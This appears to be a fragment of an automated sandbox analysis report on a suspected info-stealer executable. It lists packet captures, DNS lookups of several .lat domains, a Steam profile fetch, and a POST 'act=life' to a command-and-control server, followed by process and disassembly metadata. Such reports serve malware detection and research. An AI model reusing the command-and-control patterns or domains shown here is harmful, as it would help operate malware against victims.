                                                                                                                                                                                                                                        Dec 26, 2024 12:37:19.227207899 CET44349705104.21.66.86192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:19.227452040 CET44349705104.21.66.86192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:19.228614092 CET49705443192.168.2.7104.21.66.86
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:19.228645086 CET49705443192.168.2.7104.21.66.86
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:19.228708029 CET44349705104.21.66.86192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:20.007584095 CET44349705104.21.66.86192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:20.007669926 CET44349705104.21.66.86192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:20.007841110 CET49705443192.168.2.7104.21.66.86
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:20.106194019 CET49705443192.168.2.7104.21.66.86
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:20.106194019 CET49705443192.168.2.7104.21.66.86
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:20.106228113 CET44349705104.21.66.86192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:20.106240988 CET44349705104.21.66.86192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:20.262989998 CET49711443192.168.2.7104.21.66.86
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:20.263066053 CET44349711104.21.66.86192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:20.263170004 CET49711443192.168.2.7104.21.66.86
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:20.263554096 CET49711443192.168.2.7104.21.66.86
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:20.263586998 CET44349711104.21.66.86192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:21.279947042 CET49711443192.168.2.7104.21.66.86

                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:13.310213089 CET5559253192.168.2.71.1.1.1
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:13.448107004 CET53555921.1.1.1192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:13.452399015 CET5791553192.168.2.71.1.1.1
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:13.591062069 CET53579151.1.1.1192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:13.593087912 CET6530953192.168.2.71.1.1.1
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:13.730952978 CET53653091.1.1.1192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:13.773652077 CET5746453192.168.2.71.1.1.1
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:13.916138887 CET53574641.1.1.1192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.085767984 CET5510853192.168.2.71.1.1.1
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.224761009 CET53551081.1.1.1192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.227526903 CET5511853192.168.2.71.1.1.1
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.365967035 CET53551181.1.1.1192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.403877974 CET4942553192.168.2.71.1.1.1
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.541671991 CET53494251.1.1.1192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.544672966 CET5781653192.168.2.71.1.1.1
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.700594902 CET53578161.1.1.1192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.704430103 CET4955553192.168.2.71.1.1.1
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.845832109 CET53495551.1.1.1192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.847695112 CET6040653192.168.2.71.1.1.1
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:15.018232107 CET53604061.1.1.1192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.609899044 CET6064753192.168.2.71.1.1.1
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.915347099 CET53606471.1.1.1192.168.2.7

                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:13.310213089 CET192.168.2.71.1.1.10xa6f3Standard query (0)observerfry.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:13.452399015 CET192.168.2.71.1.1.10x76eeStandard query (0)wordyfindy.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:13.593087912 CET192.168.2.71.1.1.10x94b6Standard query (0)slipperyloo.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:13.773652077 CET192.168.2.71.1.1.10xc4b5Standard query (0)manyrestro.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.085767984 CET192.168.2.71.1.1.10xd2aaStandard query (0)shapestickyr.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.227526903 CET192.168.2.71.1.1.10x7fd9Standard query (0)talkynicer.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.403877974 CET192.168.2.71.1.1.10xa2bcStandard query (0)curverpluch.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.544672966 CET192.168.2.71.1.1.10x7862Standard query (0)tentabatte.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.704430103 CET192.168.2.71.1.1.10x27f9Standard query (0)bashfulacid.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.847695112 CET192.168.2.71.1.1.10xbe44Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.609899044 CET192.168.2.71.1.1.10x6b00Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:13.448107004 CET1.1.1.1192.168.2.70xa6f3Name error (3)observerfry.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:13.591062069 CET1.1.1.1192.168.2.70x76eeName error (3)wordyfindy.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:13.730952978 CET1.1.1.1192.168.2.70x94b6Name error (3)slipperyloo.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:13.916138887 CET1.1.1.1192.168.2.70xc4b5Name error (3)manyrestro.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.224761009 CET1.1.1.1192.168.2.70xd2aaName error (3)shapestickyr.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.365967035 CET1.1.1.1192.168.2.70x7fd9Name error (3)talkynicer.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.541671991 CET1.1.1.1192.168.2.70xa2bcName error (3)curverpluch.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.700594902 CET1.1.1.1192.168.2.70x7862Name error (3)tentabatte.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:14.845832109 CET1.1.1.1192.168.2.70x27f9Name error (3)bashfulacid.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:15.018232107 CET1.1.1.1192.168.2.70xbe44No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.915347099 CET1.1.1.1192.168.2.70x6b00No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.915347099 CET1.1.1.1192.168.2.70x6b00No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                                                                                        • lev-tolstoi.com

                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.2.74970423.55.153.1064437656C:\Users\user\Desktop\35K4Py4lii.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-26 11:37:16 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                                        2024-12-26 11:37:17 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Date: Thu, 26 Dec 2024 11:37:17 GMT
                                                                                                                                                                                                                                        Content-Length: 35121
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: sessionid=26ec1f09500c49fe3e69f097; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                        2024-12-26 11:37:17 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                        2024-12-26 11:37:17 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                        Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                        2024-12-26 11:37:17 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                        Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        1192.168.2.749705104.21.66.864437656C:\Users\user\Desktop\35K4Py4lii.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-26 11:37:19 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                        2024-12-26 11:37:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                                                                        2024-12-26 11:37:20 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Thu, 26 Dec 2024 11:37:19 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=ioece1vctqda6d1ju1l5tesflj; expires=Mon, 21 Apr 2025 05:23:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BFMk4vZuT3TaMyUw65Zj5Mg9G167COmxGrywdmQiKBNQqXLAEkfBukl4Wi7qfKKcAllLUenuemAS9qAo2%2BuHD99LnL9Ul%2FUBKvzeYzoeqTWasF%2BEv6t7cWaMFz1yvQm13PE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8f80c738ed5143c3-EWR
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1612&rtt_var=607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1796923&cwnd=211&unsent_bytes=0&cid=736fded9630c87a9&ts=790&x=0"
                                                                                                                                                                                                                                        2024-12-26 11:37:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                                                                        2024-12-26 11:37:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:06:37:11
                                                                                                                                                                                                                                        Start date:26/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\35K4Py4lii.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\35K4Py4lii.exe"
                                                                                                                                                                                                                                        Imagebase:0xb0000
                                                                                                                                                                                                                                        File size:1'922'048 bytes
                                                                                                                                                                                                                                        MD5 hash:7BA64E463F6EC058337A237846D00E01
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:0.6%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:28.7%
                                                                                                                                                                                                                                          Total number of Nodes:80
                                                                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                                                                          execution_graph 21958 ba369 21959 ba430 21958->21959 21959->21959 21962 bb100 21959->21962 21961 ba479 21963 bb190 21962->21963 21965 bb1b5 21963->21965 21966 ee0a0 21963->21966 21965->21961 21967 ee0c0 21966->21967 21968 ee0d4 21966->21968 21969 ee0f3 21966->21969 21972 ee0e8 21966->21972 21967->21968 21967->21969 21971 ee0d9 RtlReAllocateHeap 21968->21971 21973 ec570 21969->21973 21971->21972 21972->21963 21974 ec585 21973->21974 21975 ec583 21973->21975 21976 ec58a RtlFreeHeap 21974->21976 21975->21972 21976->21972 21918 eeb88 21919 eeba0 21918->21919 21919->21919 21922 eebde 21919->21922 21925 ee110 LdrInitializeThunk 21919->21925 21920 eec4e 21922->21920 21924 ee110 LdrInitializeThunk 21922->21924 21924->21920 21925->21922 21977 eea29 21978 eea50 21977->21978 21980 eea8e 21978->21980 21984 ee110 LdrInitializeThunk 21978->21984 21983 ee110 LdrInitializeThunk 21980->21983 21982 eeb59 21983->21982 21984->21980 21985 ee967 21986 ee980 21985->21986 21989 ee110 LdrInitializeThunk 21986->21989 21988 ee9ef 21989->21988 21926 b8600 21930 b860f 21926->21930 21927 b8a48 ExitProcess 21928 b8a31 21933 ee080 FreeLibrary 21928->21933 21930->21927 21930->21928 21932 bb7b0 FreeLibrary FreeLibrary 21930->21932 21932->21928 21933->21927 21990 ee760 21991 ee780 21990->21991 21991->21991 21992 ee7be 21991->21992 21994 ee110 LdrInitializeThunk 21991->21994 21994->21992 22000 f1720 22001 f1750 22000->22001 22004 f17a9 22001->22004 22006 ee110 LdrInitializeThunk 22001->22006 22002 f184e 22004->22002 22007 ee110 LdrInitializeThunk 22004->22007 22006->22004 22007->22002 22008 bddbb 22009 b1f70 22008->22009 22010 bddc0 CoUninitialize 22009->22010 22011 beea0 22010->22011 21934 e679f 21935 e67bc 21934->21935 21936 e682d 21935->21936 21938 ee110 LdrInitializeThunk 21935->21938 21938->21935 21939 eec9c 21941 eec9f 21939->21941 21940 eed6e 21941->21940 21943 ee110 LdrInitializeThunk 21941->21943 21943->21940 21944 109542 21945 109b53 VirtualAlloc 21944->21945 21946 109b82 21945->21946 21947 ec55c RtlAllocateHeap 21948 109a43 VirtualAlloc 21949 10a128 21948->21949 21950 b9d1e 21951 b9d40 21950->21951 21951->21951 21952 b9d94 LoadLibraryExW 21951->21952 21953 b9da5 21952->21953 21954 b9e74 LoadLibraryExW 21953->21954 21955 b9e85 21954->21955 21956 bef53 21957 bef5d CoInitializeEx 21956->21957 22012 bec77 22013 bec8f CoInitializeSecurity 22012->22013 22014 b9eb7 22017 efe00 22014->22017 22016 b9ec7 WSAStartup 22018 efe20 22017->22018 22018->22016 22018->22018

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 000BB100 Relevance: 19.2, Strings: 15, Instructions: 425COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 0 bb100-bb18b 1 bb190-bb199 0->1 1->1 2 bb19b-bb1ae 1->2 4 bb40b-bb40f 2->4 5 bb52f-bb538 2->5 6 bb4be-bb4c7 2->6 7 bb1bc-bb3db 2->7 8 bb4f6-bb4fd 2->8 9 bb1b5-bb1b7 2->9 10 bb414-bb4b7 call b7e30 2->10 11 bb4e4-bb4ef 2->11 12 bb6d3-bb6dc 4->12 38 bb540-bb56a 5->38 14 bb4ff-bb52a call efe00 6->14 15 bb4ce-bb4df 6->15 37 bb3e0-bb3eb 7->37 35 bb572-bb592 8->35 36 bb6df-bb6e6 9->36 10->5 10->6 10->8 10->11 16 bb789 10->16 17 bb689-bb697 10->17 18 bb748-bb76d 10->18 19 bb76f 10->19 20 bb66f-bb687 call efe00 10->20 21 bb5e3-bb5f0 10->21 22 bb623-bb62f 10->22 23 bb782 10->23 24 bb780 10->24 25 bb647-bb657 10->25 26 bb79f 10->26 27 bb65e-bb668 10->27 28 bb6fe-bb710 10->28 29 bb69c-bb6b1 10->29 30 bb792-bb79a 10->30 31 bb6f0-bb6f1 10->31 32 bb610-bb61e 10->32 33 bb717-bb732 call ee0a0 10->33 34 bb5f7-bb60e call efe00 10->34 11->5 11->8 11->16 11->17 11->18 11->19 11->20 11->21 11->22 11->23 11->24 11->25 11->26 11->27 11->28 11->29 11->30 11->31 11->32 11->33 11->34 12->36 43 bb6c6-bb6d0 14->43 15->43 16->30 44 bb7a2-bb7a9 17->44 41 bb774-bb77a 18->41 19->41 20->17 21->32 21->34 56 bb636-bb640 22->56 23->16 25->16 25->17 25->18 25->19 25->20 25->23 25->24 25->26 25->27 25->28 25->29 25->30 25->31 25->32 25->33 25->34 26->44 27->17 27->20 27->32 27->34 28->16 28->17 28->18 28->19 28->20 28->23 28->24 28->26 28->32 28->33 28->34 49 bb6ba-bb6bd 29->49 30->31 52 bb6f8 31->52 32->49 54 bb737-bb741 33->54 34->32 47 bb5a0-bb5bd 35->47 37->37 40 bb3ed-bb3f8 37->40 38->38 46 bb56c-bb56f 38->46 62 bb3fb-bb404 40->62 41->24 43->12 44->49 46->35 47->47 51 bb5bf-bb5dc 47->51 49->43 51->16 51->17 51->18 51->19 51->20 51->21 51->22 51->23 51->24 51->25 51->26 51->27 51->28 51->29 51->30 51->31 51->32 51->33 51->34 52->28 54->16 54->17 54->18 54->19 54->20 54->23 54->24 54->26 54->32 54->34 56->16 56->17 56->18 56->19 56->20 56->23 56->24 56->25 56->26 56->27 56->28 56->29 56->30 56->31 56->32 56->33 56->34 62->4 62->5 62->6 62->8 62->10 62->11 62->16 62->17 62->18 62->19 62->20 62->21 62->22 62->23 62->24 62->25 62->26 62->27 62->28 62->29 62->30 62->31 62->32 62->33 62->34
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO
                                                                                                                                                                                                                                          • API String ID: 0-620192811
                                                                                                                                                                                                                                          • Opcode ID: 7c2bb068ff7925a4a4b53cbeba57aa35f7fb44ec7636617f08fa85d16813a2ff
                                                                                                                                                                                                                                          • Instruction ID: ea34f572e04190901e6260583ca5b0a95583b33bdc3b6b595a5c2fb48dcce139
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c2bb068ff7925a4a4b53cbeba57aa35f7fb44ec7636617f08fa85d16813a2ff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C10257B1200B01CFE724CF25D891BABBBF1FB45314F508A2CD5AA8BAA1D779A445DF50
